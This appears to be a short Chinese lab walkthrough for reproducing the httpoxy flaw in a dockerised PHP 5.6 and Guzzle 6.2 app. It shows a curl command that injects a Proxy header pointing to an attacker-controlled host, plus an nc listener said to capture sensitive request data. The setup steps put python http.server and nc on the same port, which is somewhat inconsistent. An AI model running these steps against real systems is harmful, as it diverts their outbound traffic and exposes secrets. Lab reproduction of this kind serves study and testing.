docker compose up -d启动基于 PHP 5.6.23 + GuzzleHttp 6.2.0 的应用环境
访问应用页面 http://your-ip:8080/index.php,观察页面显示的Origin信息,此时Origin应与当前请求的服务器 IP 一致
准备启动一个可用的 HTTP 代理
执行python3 -m http.server 8000开启代理
执行nc -lvp 8000监听代理端口
向目标页面发送包含Proxy头的请求,头的值设为准备的代理地址
curl -H "Proxy: http://192.168.75.132:8000/" http://192.168.75.132:8080/index.php
再次访问 http://your-ip:8080/index.php,此时页面显示的Origin会变为代理服务器的 IP(如x.x.122.65),说明请求已被代理服务器转发
如图,箭头指示方向IP会改变
监听的代理端口会监听到数据包(包含敏感信息)